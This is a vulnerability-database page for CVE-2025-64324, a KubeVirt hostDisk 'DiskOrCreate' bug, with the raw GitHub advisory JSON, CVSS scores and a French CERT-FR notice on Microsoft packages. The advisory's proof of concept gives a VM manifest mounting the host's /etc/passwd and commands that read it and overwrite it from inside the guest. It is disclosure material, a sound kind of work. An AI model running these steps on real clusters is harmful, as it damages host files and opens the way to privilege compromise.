gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Inspect the permissions of the file
operator@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd
# Test the integrity of the system
operator@minikube: $sudo su
sudo: unknown user root
sudo: error initializing audit plugin sudoers_audit

Impact

Host files arbitrary read and write - this vulnerability it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality.

Severity ?

7.7 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

8.5 (High)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "kubevirt.io/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "kubevirt.io/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.7.0-alpha.0"
            },
            {
              "fixed": "1.7.0-rc.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-123",
      "CWE-200",
      "CWE-732"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-07T18:46:09Z",
    "nvd_published_at": "2025-11-18T23:15:55Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, the implementation of this feature and more specifically the `DiskOrCreate` option which creates a file if it doesn\u0027t exist, has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system.\n\n\n### Details\nThe `hostDisk` feature gate in KubeVirt allows mounting a QEMU RAW image directly from the host into a VM. While similar features, such as mounting disk images from a PVC, enforce ownership-based restrictions (e.g., only allowing files owned by specific UID, this mechanism can be subverted. For a RAW disk image to be readable by the QEMU process running within the `virt-launcher` pod, it must be owned by a user with UID 107. **If this ownership check is considered a security barrier, it can be bypassed**. In addition, the ownership of the host files mounted via this feature is changed to the user with UID 107. \n\nThe above is due to a logic bug in the code of the `virt-handler` component which prepares and sets the permissions of the volumes and data inside which are going to be mounted in the `virt-launcher` pod and consecutively consumed by the VM. It is triggered when one tries to mount a host file or directory using the `DiskOrCreate` option. The relevant code is as follows:\n\n```go\n// pkg/host-disk/host-disk.go\n\nfunc (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {\n\tfor _, volume := range vmi.Spec.Volumes {\n\t\tif hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {\n\t\t\tif err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}\n\nfunc shouldMountHostDisk(hostDisk *v1.HostDisk) bool {\n\treturn hostDisk != nil \u0026\u0026 hostDisk.Type == v1.HostDiskExistsOrCreate \u0026\u0026 hostDisk.Path != \"\"\n}\n\nfunc (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {\n\tdiskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)\n\tdiskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)\n\tfileExists, err := ephemeraldiskutils.FileExists(diskPath)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !fileExists {\n\t\tif err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\t// Change file ownership to the qemu user.\n\tif err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {\n\t\tlog.Log.Reason(err).Errorf(\"Couldn\u0027t set Ownership on %s: %v\", diskPath, err)\n\t\treturn err\n\t}\n\treturn nil\n}\n```\n\n\nThe root cause lies in the fact that if the specified by the user file does not exist, it is created by the `handleRequestedSizeAndCreateSparseRaw` function. However, this function does not explicitly set file ownership or permissions. As a result, the logic in `mountHostDiskAndSetOwnership` proceeds to the branch marked with `// Change file ownership to the qemu user`, assuming ownership should be applied. This logic fails to account for the scenario where the file already exists and may be owned by a more privileged user. \nIn such cases, changing file ownership without validating the file\u0027s origin introduces a security risk: it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality. This may also enable an **External API Attacker** to disrupt system availability.\n\n\n### PoC\nTo demonstrate this vulnerability, the `hostDisk` feature gate should be enabled when deploying the KubeVirt stack. \n\n```yaml\n# kubevirt-cr.yaml\napiVersion: kubevirt.io/v1\nkind: KubeVirt\nmetadata:\n  name: kubevirt\n  namespace: kubevirt\nspec:\n  certificateRotateStrategy: {}\n  configuration:\n    developerConfiguration:\n      featureGates:\n        -  HostDisk\n  customizeComponents: {}\n  imagePullPolicy: IfNotPresent\n  workloadUpdateStrategy: {}\n```\n\n\nInitially, if one tries to create a VM and mount `/etc/passwd` from the host using the `Disk` option which assumes that the file already exists, the following error is returned:\n\n```yaml\n# arbitrary-host-read-write.yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachine\nmetadata:\n  name: arbitrary-host-read-write\nspec:\n  runStrategy: Always\n  template:\n    metadata:\n      labels:\n        kubevirt.io/size: small\n        kubevirt.io/domain: arbitrary-host-read-write\n    spec:\n      domain:\n        devices:\n          disks:\n            - name: containerdisk\n              disk:\n                bus: virtio\n            - name: cloudinitdisk\n              disk:\n                bus: virtio\n            - name: host-disk\n              disk:\n                bus: virtio\n          interfaces:\n          - name: default\n            masquerade: {}\n        resources:\n          requests:\n            memory: 64M\n      networks:\n      - name: default\n        pod: {}\n      volumes:\n        - name: containerdisk\n          containerDisk:\n            image: quay.io/kubevirt/cirros-container-disk-demo\n        - name: cloudinitdisk\n          cloudInitNoCloud:\n            userDataBase64: SGkuXG4=\n        - name: host-disk\n          hostDisk:\n            path: /etc/passwd\n            type: Disk\n```\n\n\n```bash\n# Deploy the above VM manifest\noperator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml\n# Observe the deployment status\noperator@minikube:~$ kubectl get vm\nNAME                        AGE     STATUS             READY\narbitrary-host-read-write   7m55s   CrashLoopBackOff   False\n# Inspect the reason for the `CrashLoopBackOff`\noperator@minikube:~$ kubectl get vm arbitrary-host-read-write  -o jsonpath=\u0027{.status.conditions[3].message}\u0027\nserver error. command SyncVMI failed: \"LibvirtError(Code=1, Domain=10, Message=\u0027internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\\\"driver\\\":\\\"file\\\",\\\"filename\\\":\\\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\\\",\\\"aio\\\":\\\"native\\\",\\\"node-name\\\":\\\"libvirt-1-storage\\\",\\\"read-only\\\":false,\\\"discard\\\":\\\"unmap\\\",\\\"cache\\\":{\\\"direct\\\":true,\\\"no-flush\\\":false}}: Could not open \u0027/var/run/kubevirt-private/vmi-disks/host-disk/passwd\u0027: Permission denied\u0027)\"\n```\n\nThe hosts\u0027s `/etc/passwd` file\u0027s owner and group are `0:0` (`root:root`) hence, when one tries to deploy the above `VirtualMachine` definition, it gets a `PermissionDenied` error because the file is not owned by the user with UID `107` (`qemu`):\n\n\n```bash\n# Inspect the ownership of the host\u0027s mounted `/etc/passwd` file within the `virt-launcher` pod responsible for the VM\noperator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd\n-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd\n```\n\nHowever, if one uses the `DiskOrCreate` option, the file\u0027s ownership is silently changed to `107:107` (`qemu:qemu`) before the VM is started which allows the latter to boot, and then read and modify it.\n\n```yaml\n...\nhostDisk:\n            capacity: 1Gi\n            path: /etc/passwd\n            type: DiskOrCreate\n```\n\n```bash\n# Apply the modified manifest\noperator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml\n# Observe the deployment status\noperator@minikube::~$ kubectl get vm\nNAME                        AGE     STATUS             READY\narbitrary-host-read-write   7m55s   Running   False\n# Initiate a console connection to the running VM\noperator@minikube: virtctl console arbitrary-host-read-write\n...\n```\n\n```bash\n# Within the VM arbitrary-host-read-write, inspect the present block devices and their contents\nroot@arbitrary-host-read-write:~$ lsblk\nNAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT\nvda     253:0    0   44M  0 disk\n|-vda1  253:1    0   35M  0 part /\n`-vda15 253:15   0    8M  0 part\nvdb     253:16   0    1M  0 disk\nvdc     253:32   0  1.5K  0 disk\nroot@arbitrary-host-read-write:~$ cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\n# Write into the block device backed up by the host\u0027s `/etc/passwd` file\nroot@arbitrary-host-read-write:~$ echo \"Quarkslab\" | tee -a /dev/vdc\n```\n\nIf one inspects the file content of the host\u0027s `/etc/passwd` file, they will see that it has changed alongside its ownership:\n\n```bash\n# Inspect the contents of the file\noperator@minikube:~$ cat /etc/passwd\nQuarkslab\n:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\n# Inspect the permissions of the file\noperator@minikube:~$ ls -al /etc/passwd\n-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd\n# Test the integrity of the system\noperator@minikube: $sudo su\nsudo: unknown user root\nsudo: error initializing audit plugin sudoers_audit\n```\n\n### Impact\n\nHost files arbitrary read and write - this vulnerability it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality.",
  "id": "GHSA-46xp-26xh-hpqh",
  "modified": "2025-11-27T08:53:21Z",
  "published": "2025-11-07T18:46:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64324"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/pull/15037"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubevirt/kubevirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "KubeVirt Vulnerable to Arbitrary Host File Read and Write"
}

CERTFR-2025-AVI-1064

Vulnerability from certfr_avis - Published: 2025-12-04 - Updated: 2025-12-04

De multiples vulnérabilités ont été découvertes dans les produits Microsoft. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Microsoft	N/A	cbl2 cups 2.3.3op2-10
Microsoft	N/A	cbl2 grub2 2.06-15
Microsoft	N/A	cbl2 nodejs18 18.20.3-9
Microsoft	N/A	cbl2 fluent-bit versions antérieures à 3.0.6-5
Microsoft	N/A	azl3 kernel versions antérieures à 6.6.117.1-1
Microsoft	N/A	azl3 kubevirt 1.5.0-5
Microsoft	N/A	cbl2 python-tensorboard 2.11.0-3
Microsoft	N/A	azl3 nodejs 20.14.0-9
Microsoft	N/A	azl3 glib versions antérieures à 2.78.6-5
Microsoft	N/A	azl3 grub2 2.06-25
Microsoft	N/A	azl3 libxslt 1.1.43-1
Microsoft	N/A	azl3 expat 2.6.4-2
Microsoft	N/A	azl3 python-tensorboard 2.16.2-6
Microsoft	N/A	cbl2 rsync versions antérieures à 3.4.1-2
Microsoft	N/A	cbl2 libxslt 1.1.34-8
Microsoft	N/A	azl3 cups 2.4.13-1
Microsoft	N/A	cbl2 haproxy versions antérieures à 2.4.24-2
Microsoft	N/A	cbl2 kernel 5.15.186.1-1
Microsoft	N/A	azl3 libpng versions antérieures à 1.6.51-1
Microsoft	N/A	azl3 haproxy versions antérieures à 2.9.11-4
Microsoft	N/A	azl3 tensorflow 2.16.1-9
Microsoft	N/A	azl3 fluent-bit 3.1.9-6
Microsoft	N/A	azl3 rsync versions antérieures à 3.4.1-2
Microsoft	N/A	azl3 keras 3.3.3-5
Microsoft	N/A	cbl2 libpng versions antérieures à 1.6.51-1
Microsoft	N/A	cbl2 glib versions antérieures à 2.71.0-8
Microsoft	N/A	cbl2 kubevirt versions antérieures à 0.59.0-31
Microsoft	N/A	azl3 libvirt versions antérieures à 10.0.0-6
Microsoft	N/A	cbl2 reaper 3.1.1-19

References

Title

Publication Time

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-64324 (GCVE-0-2025-64324)

FKIE_CVE-2025-64324

MSRC_CVE-2025-64324

SUSE-SU-2025:4330-1

GHSA-46XP-26XH-HPQH

Summary

Details

PoC

Impact

CERTFR-2025-AVI-1064

Solutions

Tags

Sightings

Nomenclature